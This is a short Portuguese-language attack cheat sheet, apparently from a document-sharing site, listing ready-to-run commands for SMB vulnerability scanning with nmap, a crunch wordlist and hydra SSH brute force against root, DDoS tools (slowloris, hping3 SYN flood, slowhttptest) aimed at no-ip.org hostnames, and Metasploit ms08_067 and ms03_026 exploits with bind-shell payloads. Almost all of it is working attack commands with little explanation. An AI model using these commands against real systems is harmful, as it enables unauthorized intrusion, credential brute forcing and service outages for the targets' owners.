Você está na página 1de 2

ATAQUE PELA WAN

SCANNING COM NMAP E METASPLOIT

Comando:
nmap -v --script=smb-check-vulns dns.no-ip.org

-v = Modo Verbose
--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo,
MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.
Bruteforce
Gerar arquivo com senhas numericas para bruteforce.

crunch 3 4 -f /usr/share/crunch/charset.lst numeric -o /root/passwd.txt

Atacar usando hydra.

hydra -s 22 -v -V -l root -P /root/passwd.txt -e ns -t 16 odimup.no-ip.org ssh

DDOS
slowloris
Fazer o download do slowloris no site:
http://ha.ckers.org/slowloris/slowloris.pl

E execute o comando no diretório onde salvo o slowloris:

perl slowloris.pl -dns odimup.no-ip.org -port 80 -timeout 1 -num 1000

Syn Flood com HPING


site falando sobre o hping e synflood:
https://juancarloscunha.wordpress.com/2009/08/21/atacando-comatacando-com-syn-flood-e-hping-
derrubando-sites-com-syn-flood-e-hping-o-que-e-o-syn-flood-o-que-e-hping/

Comando:
hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood dns.no-ip.org

Slowhttptest

slowhttptest -c 1000 -X -g -o teste_slow -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://dns.no-ip.org


-p 3
ATAQUE PELA LAN
METASPLOIT 1
site: http://www.vivaolinux.com.br/artigo/Intrusao-simples-com-Metasploit?pagina=1

nmap -v --script=smb-check-vulns 192.168.0.0/24

use exploit/windows/smb/ms08_067_netapi
#Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.1.103
#Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/shell_bind_tcp
#Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa
comunicação entre LHOST e RHOST.
set LHOST localhost
#Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit
#E finalmente executamos nosso exploit.

METASPLOIT 2

use exploit/windows/dcerpc/ms03_026_dcom
set RHOST 192.168.1.103
set PAYLOAD windows/shell_bind_tcp
set LHOST localhost
exploit

Você também pode gostar